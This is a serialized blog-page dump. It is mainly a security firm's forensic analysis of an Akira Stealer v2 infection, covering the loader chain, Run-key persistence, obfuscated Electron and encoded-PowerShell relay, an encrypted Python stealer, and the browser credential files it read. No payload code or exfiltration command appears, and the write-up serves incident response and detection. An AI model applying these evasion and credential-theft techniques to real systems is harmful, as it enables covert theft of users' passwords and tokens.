strategies.\"",[12,4510,4511],{},"So we say “Merci vielmals” and raise a glass with a Bärner Müntschi. 
If you would like to read the full study in detail, we will be happy to send it to you.",{"title":65,"searchDepth":111,"depth":111,"links":4513},[4514,4515,4516],{"id":4306,"depth":111,"text":4307},{"id":4477,"depth":111,"text":4478},{"id":4494,"depth":111,"text":4495},{"lang":2170,"seoTitle":4518,"titleClass":2172,"date":4394,"categories":4519,"blogtitlepic":4520,"socialimg":4521,"customExcerpt":4522,"keywords":4523,"hreflang":4524,"footer":4529,"contactInContent":4530,"textImageTeaser":4554},"glueckkanja Switzerland named 'Rising Star' by ISG 2025 in Microsoft 365 and Azure Services",[2663],"head-isg-ch-2025.png","/blog/heads/head-isg-ch-2025.png","glueckkanja Switzerland has been named a 'Rising Star' by ISG in the Microsoft 365 Services and Managed Services for Azure categories. A recognition that shows our standards, our ambition and our services set the benchmark, even beyond national borders.","Microsoft Partner Suiza, Managed Services Azure Suiza, Microsoft 365 Services Suiza, proveedor IT Suiza, servicios Cloud Suiza, ISG Provider Lens Suiza, glueckkanja Suiza, Microsoft Cloud Suiza, Rising Star ISG 2025, seguridad informática Suiza, transformación digital Suiza, Azure Bern, consultoría Microsoft 365 Suiza, glueckkanja, glueckkanja Bern, servicios Microsoft glueckkanja",[4525,4527],{"lang":2260,"href":4526},"/blog/corporate/2025/05/isg-switzerland-2025",{"lang":2257,"href":4528},"/blog/corporate/2025/05/isg-switzerland-2025-en",{"noMargin":2180},{"quote":2180,"infos":4531},{"bgColor":2200,"headline":4408,"subline":4409,"level":41,"textStyling":2203,"flush":2204,"person":4532,"form":4539},{"image":4411,"cloudinary":2180,"alt":2414,"name":2414,"quotee":2414,"quoteeTitle":4412,"quote":4533,"detailsHeader":4414,"details":4534},"Being named a Rising Star shows that our approach is delivering results in Switzerland too: standardized, secure Microsoft services, applied pragmatically and with real added value for our 
clients.",[4535,4538],{"text":4536,"href":4537,"details":4417,"icon":2815},"+41 31 5611900","tel:+41 31 5611900",{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":4540,"method":2168,"action":2215,"fields":4541},{"skin":2214},[4542,4543,4544,4545,4546,4547,4548,4550,4552,4553],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4183},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},{"label":4427,"type":2231,"id":2232,"required":2167,"requiredMsg":4428},{"label":4430,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},{"type":2240,"id":2241,"value":2663},{"type":2240,"id":2243,"value":4549},"CH",{"type":2240,"id":2246,"value":4551},"Formulario: Blog ISG Suiza | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"image":4555,"cloudinary":2180,"alt":4440,"bgColor":4441,"list":4556,"left":2167,"firstColWidth":650,"secondColWidth":662,"copyClasses":4446,"headline":4559,"subline":4560,"spacing":4449},"/logos/isg-provider-lens-leader-de.png",[4557],{"ctaText":4444,"ctaHref":4558,"ctaType":3068},"/es/blog/corporate/2025/05/isg-germany-2025","\u003Cp>By the way, in Germany we are Leaders in Microsoft 365 and Managed Azure.\u003Cbr />Thank you, ISG!\u003C/p>","\u003Cp>See all the ISG results for Germany.\u003C/p>","/posts/2025-05-08-isg-switzerland-2025",{"title":4458,"description":4464},"posts/2025-05-08-isg-switzerland-2025",[2719,4454],"xzENbe94JRLEwbGYdUivSqq7MWYnX5_sP32WbZ8EhZ4",{"id":4567,"title":4568,"author":4569,"body":4570,"cta":2165,"description":31,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":16921,"moment":16923,"navigation":2180,"path":17015,"seo":17016,"stem":17017,"tags":17018,"webcast":2167,"__hash__":17021},"content_es/posts/2025-06-16-quiet-breach.md","Inside Akira Stealer: A full technical analysis of a modular 
stealer",[7],{"type":9,"value":4571,"toc":16776},[],[25,4573,4575],{"id":4574},"prologue","Prologue",[12,4577,31],{},[12,4579,4580,4581,4584],{},"It started like so many modern attacks do: quietly. A low-confidence Defender alert — ",[251,4582,4583],{},"\"Suspicious sequence of exploration activities\""," — surfaced during the onboarding phase of a new customer into our glueckkanja Cyber Security Operations Center (CSOC).",[12,4586,4587],{},"There were no signature hits. No malware classifications. No real-time protection response. Just a single behavioral correlation in Microsoft 365 Defender, buried in the noise — and yet, unmistakably wrong.",[12,4589,4590,4591,4594,4595,4598,4599,4602,4603],{},"While triaging the alert, one specific action caught my attention: ",[63,4592,4593],{},"python.exe"," had accessed both the ",[63,4596,4597],{},"Login Data"," and ",[63,4600,4601],{},"Web Data"," files inside a Chromium profile. Microsoft Defender immediately escalated this to a high-severity incident — ",[251,4604,4605],{},"\"Possible theft of passwords and other sensitive web browser information.\"",[12,4607,4608],{},"This wasn’t a false positive. 
It was the tip of something deeper.",[12,4610,4611,4612,4615,4616,4619,4620,4623,4624,1014],{},"Tracing the telemetry backwards, I uncovered a generic startup-located binary — ",[63,4613,4614],{},"Updater.exe"," — which spawned a NodeJS-based wrapper (",[63,4617,4618],{},"main.exe",") that executed a command line to run a script named ",[63,4621,4622],{},"astor.py"," via ",[63,4625,4593],{},[56,4627,4630],{"className":4628,"code":4629,"language":61,"meta":65},[59],"Updater.exe → main.exe → cmd.exe → python.exe Crypto\\Util\\astor.py\n",[63,4631,4629],{"__ignoreMap":65},[12,4633,4634],{},"The script didn’t just scrape credentials — it executed a sequence of post-compromise reconnaissance steps, including registry queries, system fingerprinting, and privilege-aware enumeration. It operated with surgical precision, mimicking native system behavior to evade detection. And it worked — almost.",[12,4636,4637],{},"At the time of first response:",[1255,4639,4640,4649,4656],{},[1258,4641,4642,4644,4645,4648],{},[63,4643,4614],{}," was flagged by only ",[251,4646,4647],{},"1 out of 69"," engines on VirusTotal.",[1258,4650,4651,805,4653,4655],{},[63,4652,4618],{},[63,4654,4622],{},", and all associated components were not really flagged on VirusTotal.",[1258,4657,4658],{},"No files were signed. No elevated context. Just \"ordinary\" processes doing very non-ordinary things.",[12,4660,4661,4663,4664,4666],{},[63,4662,4614],{}," didn’t touch credentials. That task was reserved for ",[63,4665,4622],{},", the in-memory Python payload — a file that, by design, left almost no trace.",[12,4668,4669,4670,4673,4674,4677],{},"Within ",[251,4671,4672],{},"21 minutes",", the affected system was isolated from the network. 
Within ",[251,4675,4676],{},"70 minutes",", credentials were rotated across all affected scopes: internal identities, SaaS platforms, third-party services.",[12,4679,4680,4681,4684],{},"But the real turning point came when we extracted and fully decrypted the Python payload. What we found was not a generic stealer — it was a custom deployment of ",[251,4682,4683],{},"Akira Stealer v2",", a commercially distributed malware family sold via Telegram.",[12,4686,4687],{},"Thanks to our in-house threat intelligence and reverse engineering capabilities, we were able to reconstruct the full functionality of the malware, extract all embedded indicators, and understand its staging, exfiltration, and credential targeting logic in detail.",[12,4689,4690],{},"More importantly — we didn’t stop at technical attribution. We went further.",[12,4692,4693,4694,4697,4698,4701,4702,4705],{},"We were able to provide the client with a ",[251,4695,4696],{},"complete dataset of exfiltrated credentials",": over ",[251,4699,4700],{},"100 unique username-password combinations",", including access credentials to cloud services, CRM systems, internal platforms, and even personal tools used by key employees. The theft had been ongoing for ",[251,4703,4704],{},"months"," — and we could account for all of it.",[12,4707,4708,4709,4712],{},"Using insights gained from this case, we built a ",[251,4710,4711],{},"post-infection analysis tool"," that scans affected systems, reconstructs credential access patterns, and generates detailed forensic reports — mapping exactly what was stolen, when, and from where.",[12,4714,4715],{},"We’ll share a glimpse of that scanner at the end of this report.",[12,4717,4718],{},"Because this is more than just an incident.\nThis is how we investigate. 
This is how we protect.",[12,4720,4721,4728,4730],{},[251,4722,4723,4724,1014],{},"Welcome to the ",[2630,4725,4727],{"href":4726},"/en/security/cloud-security-operations-center/","glueckkanja CSOC",[531,4729],{},"\nThis is how we work — because breaches don't wait.",[25,4732,4734],{"id":4733},"_1-initial-event-and-triage-summary","1. Initial Event and Triage Summary",[12,4736,31],{},[12,4738,4739,4740,4742],{},"On March 31, 2025, Microsoft Defender for Endpoint generated an alert labeled ",[251,4741,4583],{}," on a Windows 10 64-bit endpoint. I began the triage based on this signal and reviewed the affected system using the process tree, system timeline, and evidence correlated by Defender.",[41,4744,4746],{"id":4745},"_11-timeline-based-triage","1.1 Timeline-Based Triage",[12,4748,47],{},[12,4750,4751],{},"The alert pointed to a sequence of processes that warranted further inspection. During initial review, I observed the following access patterns to Chrome browser data within the local user profile:",[1255,4753,4754,4759],{},[1258,4755,4756],{},[63,4757,4758],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",[1258,4760,4761],{},[63,4762,4763],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data",[12,4765,4766,4767,4769,4770,4772],{},"These accesses were initiated by a process named ",[63,4768,4614],{},". 
While Microsoft Defender had not flagged the binary based on heuristic or behavioral analysis, I found a detection for ",[63,4771,4614],{}," on VirusTotal — flagged by a single engine at that point in time.",[12,4774,4775],{},[2772,4776],{"alt":4777,"src":4778},"Microsoft Defender","https://res.cloudinary.com/c4a8/image/upload/v1749797184/blog/pics/microsoft-defender.png",[12,4780,4781],{},"The full observed execution chain was as follows:",[56,4783,4786],{"className":4784,"code":4785,"language":61,"meta":65},[59],"winlogon.exe\n└── userinit.exe\n    └── explorer.exe\n        └── Updater.exe\n            └── main.exe\n                └── cmd.exe /d /s /c \"python.exe Crypto\\Util\\astor.py\"\n                    └── python.exe Crypto\\Util\\astor.py\n",[63,4787,4785],{"__ignoreMap":65},[12,4789,4790],{},"At this stage, no deeper static or dynamic analysis of the involved files had been performed. My focus was on understanding the high-level behavior and context. The process names and file paths were generic, and no suspicious command-line arguments were present beyond the chained Python execution.",[41,4792,4794],{"id":4793},"_12-initial-response","1.2 Initial Response",[12,4796,47],{},[12,4798,4669,4799,4801],{},[251,4800,4672],{}," of the initial alert, I initiated host isolation using Defender for Endpoint’s isolation features. The goal was to prevent potential further spread or exfiltration.",[12,4803,4804,4805,4807],{},"Within the first ",[251,4806,4676],{},", we proceeded to rotate credentials that were known to be used on the affected host — covering internal systems, SaaS platforms, and critical third-party vendors.",[12,4809,4810],{},"The reverse engineering process began after the first containment. 
The following sections document the technical deep dive that followed to investigate the breach.",[41,4812,4814],{"id":4813},"_13-response-summary-fast-transparent-impact-driven","1.3 Response Summary – Fast, Transparent, Impact-Driven",[12,4816,47],{},[12,4818,4819],{},"Our response combined speed, expertise, and operational excellence—backed by proven workflows and full visibility for the customer.",[1255,4821,4822,4828,4834,4840],{},[1258,4823,4824,4827],{},[251,4825,4826],{},"Detection to full containment in under 90 minutes","\nDefender alerts, network isolation, antivirus scan, and credential revocation executed rapidly and in concert.",[1258,4829,4830,4833],{},[251,4831,4832],{},"Deep-dive forensic response within 48 hours","\nIncluding full disk and memory analysis, browser artifact review, credential dumping detection, and behavioral reconstruction of attacker activity.",[1258,4835,4836,4839],{},[251,4837,4838],{},"Secure data recovery & evidence handling","\nThe stolen data—including cookies, passwords, tokens, and browser profiles—was recovered, forensically archived, and handed off securely to the customer.",[1258,4841,4842,4845],{},[251,4843,4844],{},"End-to-end visibility and communication","\nEvery step—from first alert to remediation and debrief—was fully documented, shared in real time, and summarized in a structured CSIRT handover.",[2109,4847,4848],{},[12,4849,4850],{},"This incident showcases how glueckkanja CSOC doesn’t just stop malware—we dismantle its effects, restore control to our customers, and turn every incident into insight.",[52,4852],{"className":4853},[4854,4855],"space-top-1","space-bottom-1",[25,4857,4859],{"id":4858},"_2-malware-architecture-and-execution-chain-overview","2. 
Malware Architecture and Execution Chain Overview",[12,4861,31],{},[12,4863,4864],{},"The malware observed on the affected endpoint followed a structured, multi-stage architecture with clear separation of responsibilities: deployment, decoding, execution, and data exfiltration.",[41,4866,4868],{"id":4867},"_21-execution-chain-overview","2.1 Execution Chain Overview",[12,4870,47],{},[12,4872,4873],{},"The observed execution flow was as follows:",[12,4875,4614],{},[56,4877,4880],{"className":4878,"code":4879,"language":61},[59],"   └── main.exe\n       └── cmd.exe\n           └── python.exe astor.py\n",[63,4881,4879],{"__ignoreMap":65},[12,4883,4884],{},"Each component in the chain contributed to stealth, modularity, and evasion. The architecture leveraged legitimate runtimes and standard OS interpreters to bypass detection mechanisms.",[186,4886,4888],{"id":4887},"_211-origin-uncertainty-missing-initial-vector","2.1.1 Origin Uncertainty: Missing Initial Vector",[12,4890,192],{},[12,4892,4893,4894,4897,4898,1014],{},"Despite extensive analysis of the post-compromise environment, the initial access vector could not be conclusively determined. This uncertainty stems primarily from the fact that the malware had remained active for an estimated ",[251,4895,4896],{},"six months prior to detection"," — exceeding the ",[251,4899,4900],{},"log retention period enforced by Microsoft Defender for Endpoint",[12,4902,4903],{},"As a result, no telemetry or forensic artifacts were available from the original time of infection. 
No initial process creation events, file drops, or command-line entries related to the delivery stage were recoverable from Defender’s timeline or associated sensors.",[12,4905,4906],{},"Based on contextual indicators and OSINT sources, a likely infection vector may have involved:",[1255,4908,4909,4915,4921],{},[1258,4910,4911,4914],{},[251,4912,4913],{},"Trojanized installers"," of cracked or modded gaming software",[1258,4916,4917,4920],{},[251,4918,4919],{},"Fake utilities"," or \"performance boosters\" distributed via forums and third-party sites",[1258,4922,4923,4926],{},[251,4924,4925],{},"Malicious browser extensions"," targeting specific user interests (e.g., crypto-related tools or Discord enhancements)",[12,4928,4929],{},"However, these remain speculative.",[12,4931,4932,4933,4936],{},"No confirmed dropper, phishing email, or compromised website could be identified during the investigation. While the malware architecture and execution chain were fully reconstructed, the ",[251,4934,4935],{},"initial point of compromise (MITRE ATT&CK T1190 / T1566)"," could not be validated.",[186,4938,4940,4941,4943],{"id":4939},"_212-updaterexe-initial-loader","2.1.2 ",[63,4942,4614],{}," – Initial Loader",[12,4945,192],{},[12,4947,4948,4949,4951],{},"When reviewing the process tree in Microsoft 365 Defender, ",[63,4950,4614],{}," stood out immediately — not because of what it did, but because of how silently it embedded itself into the system’s execution flow.",[12,4953,4954],{},"This binary was registered for automatic execution via the standard Windows Run key:",[56,4956,4959],{"className":4957,"code":4958,"language":61},[59],"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n",[63,4960,4958],{"__ignoreMap":65},[12,4962,4963],{},"That meant it would launch every time the user logged into their session — a classic persistence mechanism that requires no elevated privileges and often slips through unnoticed in EDR 
telemetry.",[1255,4965,4966,4972,4978,4984,4990],{},[1258,4967,4968,4971],{},[251,4969,4970],{},"File Type",": Windows PE executable (32-bit)",[1258,4973,4974,4977],{},[251,4975,4976],{},"Signature",": Unsigned",[1258,4979,4980,4983],{},[251,4981,4982],{},"VirusTotal Detection",": 1 out of 69 engines at the time of triage",[1258,4985,4986,4989],{},[251,4987,4988],{},"Execution Context",": Medium integrity, user session",[1258,4991,4992,1062,4995],{},[251,4993,4994],{},"Location",[63,4996,4997],{},"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",[12,4999,5000],{},"The file itself was small, cleanly compiled, and unremarkable from a static analysis standpoint. No suspicious strings, no encrypted sections, and no indicators of obfuscation or packing. It imported only a minimal set of standard Windows API functions and contained no embedded payload.",[12,5002,5003,5004,5006,5007,5009],{},"However, its behavior was more telling. Once launched, ",[63,5005,4614],{}," extracted an Electron application from a bundled archive — a self-contained NodeJS runtime packaged using standard Electron tooling. This unpacked folder contained an executable named ",[63,5008,4618],{},", which was subsequently launched as a child process.",[56,5011,5014],{"className":5012,"code":5013,"language":61,"meta":65},[59],"Updater.exe → main.exe\n",[63,5015,5013],{"__ignoreMap":65},[12,5017,5018,5019,5021,5022,5024],{},"There were no network indicators at this stage, no process injection, and no anomaly in privileges or token elevation. The entire role of ",[63,5020,4614],{}," appeared to be that of a loader — delivering a second-stage component (",[63,5023,4618],{},") into the environment, likely with the goal of maintaining stealth and modularity.",[12,5026,5027],{},"This kind of architectural separation is common in modern commodity malware and stealer toolkits. 
The initial loader acts merely as a deployment stub, allowing the heavier logic — often obfuscated, interpreted, or dynamically generated — to be contained in later stages.",[12,5029,5030,5031,5033,5034,5036,5037,1014],{},"In this case, ",[63,5032,4614],{}," served precisely that purpose: a quiet initial foothold designed to blend in, remain undetected, and pave the way for the execution of the actual stealer logic in ",[63,5035,4618],{}," and eventually ",[63,5038,4622],{},[12,5040,5041],{},"It didn’t touch the file system beyond its own directory and didn’t trigger any behavioral rules — and yet, it was the first domino in a long and carefully constructed attack chain.",[186,5043,5045,5046,5048],{"id":5044},"_213-mainexe-obfuscated-nodejs-payload-container","2.1.3 ",[63,5047,4618],{}," – Obfuscated NodeJS Payload Container",[12,5050,192],{},[12,5052,5053,5054,5056,5057,5059],{},"Following the execution of ",[63,5055,4614],{},", a second-stage binary named ",[63,5058,4618],{}," was launched. This component presented itself as a standard Electron application — a runtime environment bundling Node.js and Chromium, often used for cross-platform desktop apps. Its innocuous nature is part of what makes it so dangerous in the wrong hands.",[12,5061,5062,5063,5065,5066,5069],{},"Upon inspection, ",[63,5064,4618],{}," contained an internal archive named ",[63,5067,5068],{},"app.asar"," — the standard packaging format for Electron-based applications. 
Unlike legitimate Electron apps, however, the contents of this archive were anything but ordinary.",[1255,5071,5072,5078,5084,5092],{},[1258,5073,5074,5077],{},[251,5075,5076],{},"Platform",": Electron (Node.js + Chromium)",[1258,5079,5080,5083],{},[251,5081,5082],{},"Architecture",": 64-bit Windows",[1258,5085,5086,5089,5090],{},[251,5087,5088],{},"Content Structure",": Embedded JavaScript files within ",[63,5091,5068],{},[1258,5093,5094,5097,5098,5101],{},[251,5095,5096],{},"Obfuscation Level",": High — achieved through ",[63,5099,5100],{},"js-confuser",", a commercially available obfuscation toolkit for JavaScript",[12,5103,5104,5105,5107],{},"Once decompiled and deobfuscated, the core logic of ",[63,5106,4618],{}," became evident. Its purpose was not to present a GUI or execute any frontend logic — instead, it acted as a hidden execution orchestrator.",[12,5109,5110],{},[251,5111,5112],{},"Observed Behavior:",[1255,5114,5115,5118,5125],{},[1258,5116,5117],{},"Decrypts and reconstructs a Base64-encoded PowerShell command stored within the JavaScript payload",[1258,5119,5120,5121,5124],{},"Spawns ",[63,5122,5123],{},"cmd.exe"," to execute the PowerShell command inline",[1258,5126,5127,5128,5130,5131,1289],{},"The PowerShell command in turn invokes ",[63,5129,4593],{},", passing in a script located under a seemingly benign directory structure (",[63,5132,5133],{},"Crypto\\Util\\astor.py",[56,5135,5138],{"className":5136,"code":5137,"language":61,"meta":65},[59],"main.exe → cmd.exe /d /s /c powershell → python.exe Crypto\\Util\\astor.py\n",[63,5139,5137],{"__ignoreMap":65},[12,5141,5142],{},"This chaining allowed the attacker to shift execution contexts and evade straightforward detection. Because the payload was obfuscated and staged in-memory, traditional signature-based controls were ineffective.",[12,5144,5145],{},"The Electron framework provided an ideal cover — allowing execution of arbitrary JavaScript while avoiding scrutiny. 
JavaScript-based execution also introduced cross-platform compatibility, allowing for flexible deployment and easier integration of dynamic control logic.",[12,5147,5148,5149,5151],{},"What made ",[63,5150,4618],{}," particularly dangerous was its ability to operate without dropping any additional files beyond what had already been staged. The stealer script was invoked directly from disk, but all staging and execution logic remained embedded within the Electron bundle.",[12,5153,5154,5155,5157,5158,1014],{},"In summary, ",[63,5156,4618],{}," served as the obfuscated, multi-layered execution core — acting as the gatekeeper between initial persistence and the full activation of the Akira Stealer payload in ",[63,5159,4622],{},[186,5161,5163,5164,5166],{"id":5162},"_214-cmdexe-powershell-relay","2.1.4 ",[63,5165,5123],{}," & PowerShell Relay",[12,5168,192],{},[12,5170,5171],{},"This stage of the execution chain functioned as a relay — not for payload logic, but for obfuscation and indirection.",[12,5173,5174,5175,5177,5178,5180,5181,1014],{},"After ",[63,5176,4618],{}," completed its role of unpacking and decoding the payload, it spawned a ",[63,5179,5123],{}," process. This process did not contain any malicious logic itself, nor did it write or modify files. 
Its sole purpose was to serve as a wrapper for launching a PowerShell session with an ",[251,5182,5183],{},"encoded command",[12,5185,5186],{},"This method is a well-known tactic used to reduce visibility and avoid detection:",[1255,5188,5189,5200],{},[1258,5190,5191,1551,5194],{},[251,5192,5193],{},"Execution Chain",[56,5195,5198],{"className":5196,"code":5197,"language":61},[59],"main.exe → cmd.exe /d /s /c \"powershell -EncodedCommand \u003CBase64Payload>\"\n",[63,5199,5197],{"__ignoreMap":65},[1258,5201,5202,1551,5205],{},[251,5203,5204],{},"Purpose",[1255,5206,5207,5210,5213],{},[1258,5208,5209],{},"Encapsulates PowerShell execution within an additional shell",[1258,5211,5212],{},"Hides the actual PowerShell code from direct visibility in logs",[1258,5214,5215,5216,5219],{},"Evades EDRs that trigger on direct ",[63,5217,5218],{},"powershell.exe"," usage with suspicious parameters",[12,5221,5222,5223,5225],{},"By embedding the PowerShell script as a Base64-encoded string and invoking it through ",[63,5224,5123],{},", the attacker avoided multiple forms of detection:",[1255,5227,5228,5233,5238],{},[1258,5229,5230],{},[251,5231,5232],{},"Command-line heuristic filters",[1258,5234,5235],{},[251,5236,5237],{},"Standard logging (e.g., Event ID 4104, 4688)",[1258,5239,5240],{},[251,5241,5242,5243,5245,5246,805,5249,5252],{},"Rule-based detections for ",[63,5244,5218],{}," arguments like ",[63,5247,5248],{},"-NoProfile",[63,5250,5251],{},"-ExecutionPolicy Bypass",", or inline scripts",[12,5254,5255,5256,5258,5259,5261],{},"Notably, the PowerShell command was kept minimal and solely focused on launching ",[63,5257,4593],{}," with a path to the embedded stealer script — ",[63,5260,4622],{},". 
No additional modules were loaded, and no obvious signatures were present in memory.",[12,5263,5264],{},"This relay technique is often used in red teaming and by sophisticated infostealers alike — serving as a lightweight evasion layer that’s easy to implement but hard to catch without telemetry correlation.",[12,5266,5030,5267,5269],{},[63,5268,5123],{}," served exactly that purpose: a simple, silent bridge between JavaScript logic and Python execution — one that almost slipped through unnoticed.",[186,5271,5273,5274,5276,5277],{"id":5272},"_215-pythonexe-with-astorpy","2.1.5 ",[63,5275,4593],{}," with ",[63,5278,4622],{},[12,5280,192],{},[12,5282,5283,5284,5286,5287,5289],{},"The final and most impactful stage of the execution chain was reached when ",[63,5285,4593],{}," invoked ",[63,5288,4622],{}," — a Python-based, modular infostealer operating entirely in memory. This script represented the operational core of the entire attack chain.",[12,5291,5292,5293,5295],{},"Unlike many commodity stealers, ",[63,5294,4622],{}," was not deployed in plaintext. 
It was protected by a multi-layered decryption mechanism:",[1255,5297,5298,5307],{},[1258,5299,5300,5303,5304,1014],{},[251,5301,5302],{},"Decryption Stack",": The file was first GZIP-compressed and then encrypted using ",[251,5305,5306],{},"AES-256-CBC",[1258,5308,5309,5312],{},[251,5310,5311],{},"Key Derivation",": A PBKDF2-based key derivation process was used (SHA-512, 1,000,000 iterations), making static analysis and brute-forcing highly impractical.",[12,5314,5315],{},"Once decrypted at runtime, the script executed several specialized modules, all targeting sensitive data sources:",[12,5317,5318],{},[251,5319,5320],{},"Core Capabilities",[1255,5322,5323,5329,5339,5349],{},[1258,5324,5325,5328],{},[251,5326,5327],{},"Browser Data Extraction",": Retrieved login credentials, cookies, and autofill data from Chromium-based browsers (Chrome, Edge, Brave, Opera)",[1258,5330,5331,5334,5335,5338],{},[251,5332,5333],{},"Token Harvesting",": Collected session tokens, particularly from ",[251,5336,5337],{},"Discord",", and scanned for cryptocurrency wallet extensions",[1258,5340,5341,5344,5345,5348],{},[251,5342,5343],{},"Data Packaging",": Aggregated all harvested data into a structured ",[251,5346,5347],{},"ZIP archive",", preserving directory and file context for attacker-side parsing",[1258,5350,5351,5354],{},[251,5352,5353],{},"Exfiltration",": Uploaded the resulting archive to public APIs and infrastructure.",[12,5356,5357],{},[251,5358,4988],{},[12,5360,5361],{},"The entire stealer logic executed from memory, with no persistent files written to disk. It left minimal telemetry traces beyond in-process memory artifacts and standard subprocess invocation. 
No attempt was made to establish persistence at this stage — the goal was quick, efficient, and silent data theft.",[12,5363,5364],{},"The use of legitimate APIs for exfiltration also made detection and prevention significantly harder, as outbound traffic blended in with routine internet activity.",[12,5366,5367,5368,5370],{},"This stage ultimately confirmed the malware’s identity: a variant of ",[251,5369,4683],{},", known for its:",[1255,5372,5373,5376,5379,5382],{},[1258,5374,5375],{},"High modularity",[1258,5377,5378],{},"Runtime obfuscation",[1258,5380,5381],{},"Commercial distribution via Telegram",[1258,5383,5384],{},"Strong focus on credential harvesting and token-based session hijacking",[12,5386,5387,5388,5390],{},"Together with the earlier stages, ",[63,5389,4622],{}," formed the critical endpoint of a stealthy and well-engineered infostealer chain. In the following sections, we dissect this component further and explain how we reversed its logic, mapped its infrastructure, and recovered every indicator of compromise used during its operation.",[25,5392,5394,5395],{"id":5393},"_3-deep-dive-updaterexe","3. Deep Dive: ",[63,5396,4614],{},[12,5398,31],{},[12,5400,5401,5403],{},[63,5402,4614],{}," was the initial binary observed during post-compromise analysis. 
Despite its neutral appearance and negligible detection footprint, it played a critical role in maintaining the malware's operational persistence and delivering the next-stage payload.",[41,5405,5407],{"id":5406},"_31-properties","3.1 Properties",[12,5409,47],{},[417,5411,5412,5422],{},[422,5413,5414],{},[426,5415,5416,5419],{},[430,5417,5418],{},"Property",[430,5420,5421],{},"Value",[438,5423,5424,5434,5444,5454,5464,5474],{},[426,5425,5426,5431],{},[443,5427,5428],{},[251,5429,5430],{},"Format:",[443,5432,5433],{},"Windows Portable Executable (PE32)",[426,5435,5436,5441],{},[443,5437,5438],{},[251,5439,5440],{},"Architecture:",[443,5442,5443],{},"x86-64",[426,5445,5446,5451],{},[443,5447,5448],{},[251,5449,5450],{},"Size:",[443,5452,5453],{},"~154 KB",[426,5455,5456,5461],{},[443,5457,5458],{},[251,5459,5460],{},"Entropy:",[443,5462,5463],{},"Normal (non-packed)",[426,5465,5466,5471],{},[443,5467,5468],{},[251,5469,5470],{},"Signatures:",[443,5472,5473],{},"None",[426,5475,5476,5481],{},[443,5477,5478],{},[251,5479,5480],{},"VirusTotal Detection:",[443,5482,5483],{},"1/69 at time of analysis",[12,5485,5486],{},"The file exhibited a clean import table and no embedded string indicators. No known packers, crypters, or runtime obfuscation mechanisms were detected. The structure was consistent with custom-compiled binaries.",[41,5488,5490],{"id":5489},"_32-behavioral-analysis","3.2 Behavioral Analysis",[12,5492,47],{},[12,5494,5495],{},[251,5496,5497],{},"No User Interaction Required",[12,5499,5500,5501,5503],{},"The malware chain executed without any required user interaction. Based on Defender’s process telemetry, the initial binary (",[63,5502,4614],{},") was launched automatically — most likely via a persistence mechanism such as a registry autorun key. 
However, due to the age of the compromise and the absence of historical event logs, the exact method of persistence could not be recovered.",[12,5505,5506],{},[251,5507,5508],{},"Silent Execution and Staging",[12,5510,5511,5512,5514,5515,5517],{},"Upon execution, ",[63,5513,4614],{}," immediately launched ",[63,5516,4618],{}," with no visual window and no user prompts. The staging occurred silently in the background. There was no evidence of user consent dialogs, UAC prompts, or GUI components.",[12,5519,5520],{},[251,5521,5522],{},"Payload Deployment Behavior",[12,5524,5525,5527],{},[63,5526,4618],{}," was found to be part of an Electron application structure, but the exact origin of its deployment remains unclear. One of the following is assumed:",[1255,5529,5530,5536],{},[1258,5531,5532,5533,5535],{},"The payload may have been bundled internally within ",[63,5534,4614],{}," (e.g., embedded resource), or",[1258,5537,5538],{},"It may have been retrieved from a remote source",[12,5540,5541],{},"Due to a lack of network telemetry and no recovered hardcoded URL, the delivery vector for the Electron app remains inconclusive.",[12,5543,5544],{},[251,5545,5546],{},"Process Chain Behavior",[12,5548,5549,5550,5552,5553,5555],{},"Once executed, ",[63,5551,4614],{}," spawned ",[63,5554,4618],{}," as a child process. The invocation was non-interactive, and no process spawned from the chain exhibited UI activity. The process chain continued as expected:",[56,5557,5560],{"className":5558,"code":5559,"language":61},[59],"Updater.exe → main.exe → cmd.exe → powershell (encoded) → python.exe astor.py\n",[63,5561,5559],{"__ignoreMap":65},[12,5563,5564],{},"All execution stages operated without requiring user input, relying solely on pre-configured launch logic and silent execution paths. 
This minimized exposure and helped the malware remain undetected over an extended period.",[41,5566,5568],{"id":5567},"_33-role-in-the-infection-chain","3.3 Role in the Infection Chain",[12,5570,47],{},[12,5572,5573,5575,5576,5579,5580,1014],{},[63,5574,4614],{}," played a ",[251,5577,5578],{},"single but essential role"," within the broader infection chain: it was responsible for the persistence and redeployment of the stage-2 component — ",[63,5581,4618],{},[12,5583,5584],{},[251,5585,5586],{},"Confirmed Characteristics",[1255,5588,5589,5596,5601],{},[1258,5590,5591,5592,5595],{},"It ",[251,5593,5594],{},"did not"," contain or execute malicious logic directly",[1258,5597,5591,5598,5600],{},[251,5599,5594],{}," perform any data exfiltration",[1258,5602,5591,5603,5605],{},[251,5604,5594],{}," interact with browser credential stores or sensitive user data",[12,5607,5608,5609,5611],{},"Its sole purpose was to silently launch ",[63,5610,4618],{}," during user login, using a registry autorun entry as the most likely method of persistence (though not directly recovered due to telemetry limitations).",[12,5613,5614,5615,5617,5618,5620],{},"By acting as an isolated first-stage loader, ",[63,5616,4614],{}," ensured that the actual stealer payload (",[63,5619,4622],{},") remained concealed in deeper layers of execution. 
